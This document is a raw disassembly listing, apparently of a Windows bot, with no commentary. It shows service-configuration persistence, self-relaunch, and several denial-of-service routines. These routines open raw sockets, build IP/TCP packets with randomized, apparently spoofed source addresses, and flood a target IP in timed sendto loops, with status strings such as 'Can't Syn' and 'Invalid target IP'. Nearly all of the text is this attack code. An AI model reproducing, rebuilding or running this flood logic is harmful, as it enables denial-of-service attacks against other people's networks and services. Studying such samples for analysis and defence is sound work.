loc_4222F7: ; CODE XREF: sub_42226C+25�j
; sub_42226C+3E�j ...
xor eax, eax
jmp loc_42238F
; ---------------------------------------------------------------------------
loc_4222FE: ; CODE XREF: sub_42226C+89�j
push [ebp+var_C]
call dword_43703C ; LocalFree
xor ebx, ebx
loc_422309: ; CODE XREF: sub_42226C+51�j
push 2
push esi
push dword_46AFCC
call dword_456DA8 ; OpenServiceA
mov dword_46AFCC, eax
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea eax, [ebp+var_34]
push eax
push 2
push [ebp+var_4]
mov [ebp+var_1C], 0BB8h
mov [ebp+var_20], edi
mov [ebp+var_28], edi
mov [ebp+var_2C], ebx
mov [ebp+var_30], ebx
mov [ebp+var_34], 0Ah
call dword_456FF0 ; ChangeServiceConfig2A
test eax, eax
jnz short loc_422353
mov [ebp+var_8], ebx
loc_422353: ; CODE XREF: sub_42226C+E2�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push edi
push [ebp+var_4]
call dword_456FF0 ; ChangeServiceConfig2A
test eax, eax
jnz short loc_42236E
mov [ebp+var_8], ebx
loc_42236E: ; CODE XREF: sub_42226C+FD�j
push [ebp+var_14]
call dword_456F34 ; UnlockServiceDatabase
push [ebp+var_4]
call dword_456DC4 ; CloseServiceHandle
push dword_46AFCC
call dword_456DC4 ; CloseServiceHandle
mov eax, [ebp+var_8]
loc_42238F: ; CODE XREF: sub_42226C+8D�j
pop edi
pop esi
pop ebx
leave
retn
sub_42226C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422394 proc near ; CODE XREF: sub_42211B+3A�p
; sub_42211B+8C�p
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_15B = byte ptr -15Bh
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 364h
push ebx
push esi
push edi
lea eax, [ebp+var_364]
push 104h
xor ebx, ebx
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_15B]
mov [ebp+var_15C], bl
push ebx
rep stosd
push dword_44398C
stosw
stosb
lea eax, [ebp+var_15C]
push eax
push ebx
call dword_437258
mov esi, dword_4370A4
lea eax, [ebp+var_15C]
push eax
push offset dword_457CF8
call esi ; dword_4370A4
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
call esi ; dword_4370A4
mov esi, offset dword_443990
lea eax, [ebp+var_260]
push esi
push eax
push offset dword_445D48
push [ebp+arg_0]
call sub_429A33
lea eax, [ebp+var_260]
push esi
push eax
call sub_4277E9
add esp, 18h
test eax, eax
jz loc_4224ED
push 1
mov edi, offset byte_443B3B
push [ebp+arg_0]
mov esi, offset dword_443A3C
push edi
push esi
push 80000001h
call sub_421340
push 1
push [ebp+arg_0]
push edi
push esi
push dword_443A38
call sub_421340
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_429690
push 44h
lea eax, [ebp+var_58]
pop esi
push esi
push ebx
push eax
call sub_429690
add esp, 40h
lea eax, [ebp+var_14]
mov [ebp+var_58], esi
xor esi, esi
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_260]
push eax
inc esi
push ebx
push 28h
push esi
push ebx
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_4C], offset byte_454A34
mov [ebp+var_2C], esi
mov [ebp+var_28], bx
call dword_437188 ; CreateProcessA
test eax, eax
jz short loc_4224E6
push 0C8h
call dword_43718C ; Sleep
push [ebp+var_14]
mov esi, dword_437044
call esi ; dword_437044
push [ebp+var_10]
call esi ; dword_437044
call dword_456E38 ; WSACleanup
push ebx
call dword_4370C4 ; ExitProcess
loc_4224E6: ; CODE XREF: sub_422394+128�j
push esi
call dword_4370C4 ; ExitProcess
loc_4224ED: ; CODE XREF: sub_422394+A3�j
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push offset sub_418EDB
push ebx
push ebx
call dword_43717C ; CreateThread
mov esi, eax
cmp esi, ebx
jz short loc_422516
push 0FFFFFFFFh
push esi
call dword_43707C ; WaitForSingleObject
push esi
call dword_437044 ; CloseHandle
loc_422516: ; CODE XREF: sub_422394+170�j
pop edi
pop esi
pop ebx
leave
retn
sub_422394 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42251B proc near ; CODE XREF: sub_42283A+1F�p
var_2944 = byte ptr -2944h
var_234 = byte ptr -234h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_98 = byte ptr -98h
var_90 = byte ptr -90h
var_7C = byte ptr -7Ch
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 2944h
call sub_429A90
push ebx
push esi
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_A3]
mov [ebp+var_A4], bl
mov esi, 100h
rep stosd
stosw
push esi
stosb
call sub_42B407
pop ecx
mov edi, eax
push esi
push edi
call dword_456F2C ; gethostname
push edi
call dword_456FB4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_234]
push eax
push 202h
call dword_4372B4 ; WSAStartup
test eax, eax
jz short loc_422587
push ebx
call dword_437170 ; ExitThread
loc_422587: ; CODE XREF: sub_42251B+63�j
xor esi, esi
inc esi
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4372C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_4225D0
call dword_4372D8 ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429AEE
add esp, 14h
push ebx
call dword_437170 ; ExitThread
loc_4225D0: ; CODE XREF: sub_42251B+87�j
lea ecx, [ebp+var_48]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_48], esi
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_422614
call dword_4372D8 ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429AEE
add esp, 14h
push ebx
call dword_437170 ; ExitThread
loc_422614: ; CODE XREF: sub_42251B+CB�j
push [ebp+arg_4]
mov esi, dword_4372C0
mov [ebp+var_68], 2
call esi ; dword_4372C0
mov edi, [ebp+arg_0]
push 28h
mov [ebp+var_66], ax
mov [ebp+var_64], edi
mov [ebp+var_24], 45h
call esi ; dword_4372C0
push [ebp+arg_4]
mov [ebp+var_22], ax
mov [ebp+var_20], 1
mov [ebp+var_1E], bx
mov [ebp+var_1C], 80h
mov [ebp+var_1B], 6
mov [ebp+var_1A], bx
mov [ebp+var_14], edi
call esi ; dword_4372C0
push 4000h
mov [ebp+var_36], ax
mov [ebp+var_30], ebx
mov [ebp+var_2C], 50h
mov [ebp+var_2B], 2
call esi ; dword_4372C0
mov [ebp+var_2A], ax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_26], bx
mov [ebp+arg_4], ebx
call dword_4370BC ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call dword_4370C0 ; QueryPerformanceCounter
push [ebp+var_54]
mov eax, [ebp+arg_8]
cdq
push [ebp+var_58]
push edx
push eax
call sub_42C420
add eax, [ebp+var_8]
adc edx, [ebp+var_4]
mov [ebp+var_50], eax
mov [ebp+var_4C], edx
loc_4226AB: ; CODE XREF: sub_42251B+2DA�j
call sub_429ACC
cdq
mov ecx, 0FFh
push 14h
idiv ecx
mov eax, [ebp+var_10]
mov [ebp+var_28], bx
and eax, 0FFFFFFh
mov [ebp+var_3C], bl
mov [ebp+var_3B], 6
shl edx, 18h
or edx, eax
mov eax, [ebp+var_14]
mov edi, edx
mov [ebp+var_40], eax
mov [ebp+var_10], edi
call esi ; dword_4372C0
mov [ebp+var_3A], ax
mov [ebp+var_18], edi
call sub_429ACC
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call esi ; dword_4372C0
mov [ebp+var_38], ax
call sub_429ACC
mov edi, eax
shl edi, 10h
call sub_429ACC
or edi, eax
push edi
call esi ; dword_4372C0
movzx eax, ax
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
mov [ebp+var_44], eax
lea eax, [ebp+var_44]
push 0Ch
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429350
push 14h
lea eax, [ebp+var_38]
pop edi
push edi
push eax
lea eax, [ebp+var_98]
push eax
call sub_429350
lea eax, [ebp+var_A4]
push 20h
push eax
call sub_41E322
mov [ebp+var_28], ax
lea eax, [ebp+var_24]
push edi
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429350
lea eax, [ebp+var_38]
push edi
push eax
lea eax, [ebp+var_90]
push eax
call sub_429350
push 4
lea eax, [ebp+var_7C]
push ebx
push eax
call sub_429690
add esp, 44h
lea eax, [ebp+var_A4]
push 28h
push eax
call sub_41E322
mov [ebp+var_1A], ax
push edi
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_A4]
push eax
call sub_429350
add esp, 14h
lea eax, [ebp+var_68]
push 10h
push eax
push ebx
lea eax, [ebp+var_A4]
push 28h
push eax
push [ebp+var_C]
call dword_437290 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4227FA
add [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax
call dword_4370C0 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, [ebp+var_4C]
jg short loc_422823
jl short loc_4227EC
mov eax, [ebp+var_8]
cmp eax, [ebp+var_50]
jnb short loc_422823
loc_4227EC: ; CODE XREF: sub_42251B+2C7�j
push [ebp+arg_C]
call dword_43718C ; Sleep
jmp loc_4226AB
; ---------------------------------------------------------------------------
loc_4227FA: ; CODE XREF: sub_42251B+2B0�j
call dword_4372D8 ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSErrorD ; "%s Error: %d"
lea eax, [ebp+var_2944]
push 2710h
push eax
call sub_429AEE
add esp, 14h
xor eax, eax
jmp short loc_422835
; ---------------------------------------------------------------------------
loc_422823: ; CODE XREF: sub_42251B+2C5�j
; sub_42251B+2CF�j
push [ebp+var_C]
call dword_4372D4 ; closesocket
call dword_4372A8 ; WSACleanup
mov eax, [ebp+arg_4]
loc_422835: ; CODE XREF: sub_42251B+306�j
pop edi
pop esi
pop ebx
leave
retn
sub_42251B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42283A proc near ; CODE XREF: sub_4228EE+50�p
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 2710h
call sub_429A90
push [ebp+arg_14]
call sub_41E326
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push eax
call sub_42251B
add esp, 14h
test eax, eax
jnz short loc_4228E0
push esi
call dword_4372D8 ; WSAGetLastError
push eax
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSCanTSyn_Error ; "%s Can't Syn. Error: %d"
lea eax, [ebp+var_2710]
push 2710h
push eax
call sub_429AEE
add esp, 14h
cmp [ebp+arg_8], 0
mov esi, offset aS_5 ; "%s"
jnz short loc_4228B2
cmp [ebp+arg_C], 0
jnz short loc_4228B8
lea eax, [ebp+var_2710]
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_4228B2: ; CODE XREF: sub_42283A+5A�j
cmp [ebp+arg_C], 0
jz short loc_4228CE
loc_4228B8: ; CODE XREF: sub_42283A+60�j
lea eax, [ebp+var_2710]
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_4228CE: ; CODE XREF: sub_42283A+7C�j
push [ebp+arg_10]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
pop esi
loc_4228E0: ; CODE XREF: sub_42283A+29�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv [ebp+arg_1C]
leave
retn
sub_42283A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228EE proc near ; DATA XREF: sub_40A938+6B13�o
var_2830 = byte ptr -2830h
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2830h
call sub_429A90
mov eax, [ebp+arg_0]
push esi
push edi
push 48h
pop ecx
mov esi, eax
lea edi, [ebp+var_120]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+11Ch], 1
lea eax, [ebp+var_11C]
mov edi, [ebp+var_120]
push [ebp+var_14]
push [ebp+var_18]
push eax
lea eax, [ebp+var_9C]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_8]
push eax
push edi
call sub_42283A
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push offset aSS@IkbS ; "%s %s @ (%iKB/s)"
lea eax, [ebp+var_2830]
push 2710h
push eax
call sub_429AEE
add esp, 3Ch
cmp [ebp+var_8], 0
mov esi, offset aS_5 ; "%s"
jnz short loc_422990
cmp [ebp+var_C], 0
jnz short loc_422996
lea eax, [ebp+var_2830]
push eax
lea eax, [ebp+var_9C]
push esi
push eax
push edi
call sub_41CD84
add esp, 10h
loc_422990: ; CODE XREF: sub_4228EE+82�j
cmp [ebp+var_C], 0
jz short loc_4229AE
loc_422996: ; CODE XREF: sub_4228EE+88�j
lea eax, [ebp+var_2830]
push eax
lea eax, [ebp+var_9C]
push esi
push eax
push edi
call sub_41CD0E
add esp, 10h
loc_4229AE: ; CODE XREF: sub_4228EE+A6�j
push [ebp+var_1C]
call sub_42355A
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_4228EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229BF proc near ; DATA XREF: sub_40A938+792E�o
var_2834 = byte ptr -2834h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2834h
call sub_429A90
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_124]
rep movsd
push [ebp+var_10]
mov edi, [ebp+var_124]
mov dword ptr [eax+120h], 1
lea eax, [ebp+var_A0]
push [ebp+var_C]
push eax
push edi
push [ebp+var_8]
lea eax, [ebp+var_120]
push [ebp+var_20]
push [ebp+var_14]
push [ebp+var_18]
push [ebp+var_1C]
push eax
call sub_422A87
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
lea eax, [ebp+var_2834]
push offset aSS_1 ; "%s %s"
push eax
call sub_429A33
xor esi, esi
add esp, 3Ch
cmp [ebp+var_C], esi
jnz short loc_422A59
cmp [ebp+var_10], esi
jnz short loc_422A5E
lea eax, [ebp+var_2834]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_41CD84
add esp, 0Ch
loc_422A59: ; CODE XREF: sub_4229BF+7C�j
cmp [ebp+var_10], esi
jz short loc_422A75
loc_422A5E: ; CODE XREF: sub_4229BF+81�j
lea eax, [ebp+var_2834]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_41CD0E
add esp, 0Ch
loc_422A75: ; CODE XREF: sub_4229BF+9D�j
push [ebp+var_20]
call sub_42355A
pop ecx
push esi
call dword_437170 ; ExitThread
pop edi
pop esi
sub_4229BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A87 proc near ; CODE XREF: sub_4229BF+53�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
xor esi, esi
push edi
inc esi
push 338h
push 200h
mov [ebp+var_1C], esi
call sub_41E34F
pop ecx
mov [ebp+var_4], eax
pop ecx
mov ebx, 0FFh
push 2
xor ecx, ecx
pop edx
xor eax, eax
cmp [ebp+arg_14], esi
lea edi, [ebp+var_54]
mov [ebp+var_88], ecx
mov [ebp+var_84], esi
mov [ebp+var_80], edx
mov [ebp+var_7C], 4
mov [ebp+var_78], 6
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 0Eh
mov [ebp+var_68], 15h
mov [ebp+var_64], 2Ch
mov [ebp+var_60], 6Fh
mov [ebp+var_5C], ebx
mov [ebp+var_58], ecx
mov [ebp+var_4C], ecx
stosd
lea edi, [ebp+var_24]
mov [ebp+var_48], ecx
mov [ebp+var_44], ecx
mov [ebp+var_40], 200h
mov [ebp+var_3C], edx
mov [ebp+var_38], 4
mov [ebp+var_34], 10h
mov [ebp+var_30], 1A0Ah
mov [ebp+var_2C], esi
mov [ebp+var_28], ecx
stosd
jnz short loc_422B50
push offset dword_457C20
call sub_41E326
pop ecx
mov edi, eax
jmp short loc_422B74
; ---------------------------------------------------------------------------
loc_422B50: ; CODE XREF: sub_422A87+B8�j
mov esi, 100h
push esi
call sub_42B407
pop ecx
mov edi, eax
push esi
push edi
call dword_456F2C ; gethostname
push edi
call dword_456FB4 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov edi, [eax]
loc_422B74: ; CODE XREF: sub_422A87+C7�j
push ebx
push 3
push 2
call dword_4372B8 ; socket
lea ecx, [ebp+var_1C]
push 4
push ecx
push 2
push 0
push eax
mov [ebp+arg_14], eax
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_422BFA
cmp [ebp+arg_20], 0
mov edi, dword_43716C
mov esi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
mov ebx, offset aSCanTUseRawOpt ; "%s Can't use raw opt: %d"
jnz short loc_422BC7
cmp [ebp+arg_24], 0
jnz short loc_422BCD
call edi ; dword_43716C
push eax
push esi
push ebx
push [ebp+arg_1C]
push [ebp+arg_18]
call sub_41CD84
add esp, 14h
loc_422BC7: ; CODE XREF: sub_422A87+125�j
cmp [ebp+arg_24], 0
jz short loc_422BE0
loc_422BCD: ; CODE XREF: sub_422A87+12B�j
call edi ; dword_43716C
push eax
push esi
push ebx
push [ebp+arg_1C]
push [ebp+arg_18]
call sub_41CD0E
add esp, 14h
loc_422BE0: ; CODE XREF: sub_422A87+144�j
push [ebp+arg_14]
call dword_4372D4 ; closesocket
push [ebp+arg_10]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
loc_422BFA: ; CODE XREF: sub_422A87+10F�j
push [ebp+var_4]
call sub_4296E8
mov esi, dword_437184
pop ecx
mov [ebp+arg_24], eax
call esi ; dword_437184
push [ebp+arg_0]
mov [ebp+arg_1C], eax
call dword_456F5C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4372C0 ; ntohs
mov [ebp+var_96], ax
jmp loc_422D16
; ---------------------------------------------------------------------------
loc_422C3E: ; CODE XREF: sub_422A87+2A0�j
call sub_429ACC
cdq
mov ecx, ebx
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429ACC
cdq
mov ecx, 0F4h
idiv ecx
mov [ebp+var_50], edx
call sub_429ACC
cdq
mov ecx, 1FA4h
mov [ebp+var_18], 45h
idiv ecx
mov [ebp+var_17], 4
mov [ebp+var_20], edx
call sub_429ACC
mov [ebp+var_14], ax
call sub_429ACC
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_4C]
push eax
call dword_456F18 ; ntohs
push [ebp+var_4]
mov [ebp+var_12], ax
call dword_456F18 ; ntohs
mov [ebp+var_16], ax
mov [ebp+var_10], bl
call sub_429ACC
push 0Eh
mov [ebp+var_C], edi
cdq
pop ecx
idiv ecx
push [ebp+arg_0]
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_F], al
call dword_456F5C ; inet_addr
mov [ebp+var_8], eax
lea eax, [ebp+var_18]
push 14h
push eax
call sub_41E322
mov [ebp+var_E], ax
lea eax, [ebp+var_18]
push 14h
push eax
push [ebp+arg_24]
call sub_429350
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push [ebp+var_4]
push [ebp+arg_24]
push [ebp+arg_14]
call dword_437290 ; sendto
push [ebp+arg_C]
call dword_43718C ; Sleep
loc_422D16: ; CODE XREF: sub_422A87+1B2�j
call esi ; dword_437184
sub eax, [ebp+arg_1C]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+arg_8]
jbe loc_422C3E
push [ebp+arg_24]
call sub_429822
pop ecx
push [ebp+arg_14]
call dword_4372D4 ; closesocket
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_422A87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D47 proc near ; DATA XREF: sub_40A938+941A�o
var_2A5C = byte ptr -2A5Ch
var_34C = byte ptr -34Ch
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = word ptr -62h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2A5Ch
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 69h
mov esi, eax
pop ecx
lea edi, [ebp+var_24C]
rep movsd
xor esi, esi
push 0Eh
inc esi
xor ebx, ebx
mov [eax+1A0h], esi
mov eax, [ebp+var_24C]
mov [ebp+arg_0], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_A7]
mov [ebp+var_A8], bl
rep stosd
stosw
stosb
mov edi, dword_437184
call edi ; dword_437184
push eax
call sub_429ABF
pop ecx
push 0FFh
push 3
push 2
call dword_4372B8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_422E4C
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSD__0 ; "%s %s <%d>."
push eax
call sub_429A33
add esp, 14h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_422E0F
cmp [ebp+var_B4], ebx
jnz short loc_422E17
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_422E0F: ; CODE XREF: sub_422D47+A4�j
cmp [ebp+var_B4], ebx
jz short loc_422E31
loc_422E17: ; CODE XREF: sub_422D47+AC�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_422E31: ; CODE XREF: sub_422D47+CE�j
push 0FFFFFFFFh
call dword_4372D4 ; closesocket
push [ebp+var_C8]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_422E4C: ; CODE XREF: sub_422D47+6E�j
lea ecx, [ebp+var_3C]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_3C], esi
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz loc_422EFA
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSSD__0 ; "%s %s <%d>."
push eax
call sub_429A33
add esp, 14h
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_422EBC
cmp [ebp+var_B4], ebx
jnz short loc_422EC4
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 10h
loc_422EBC: ; CODE XREF: sub_422D47+151�j
cmp [ebp+var_B4], ebx
jz short loc_422EDE
loc_422EC4: ; CODE XREF: sub_422D47+159�j
lea eax, [ebp+var_2A5C]
push eax
lea eax, [ebp+var_148]
push edi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 10h
loc_422EDE: ; CODE XREF: sub_422D47+17B�j
push [ebp+var_8]
call dword_4372D4 ; closesocket
push [ebp+var_C8]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
loc_422EFA: ; CODE XREF: sub_422D47+11B�j
lea eax, [ebp+var_248]
push eax
call dword_4372BC ; inet_addr
cmp eax, 0FFFFFFFFh
jnz loc_422F96
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
lea eax, [ebp+var_2A5C]
push offset aSInvalidTarget ; "%s Invalid target IP."
push eax
call sub_429A33
add esp, 0Ch
cmp [ebp+var_B0], ebx
mov edi, offset aS_5 ; "%s"
jnz short loc_422F58
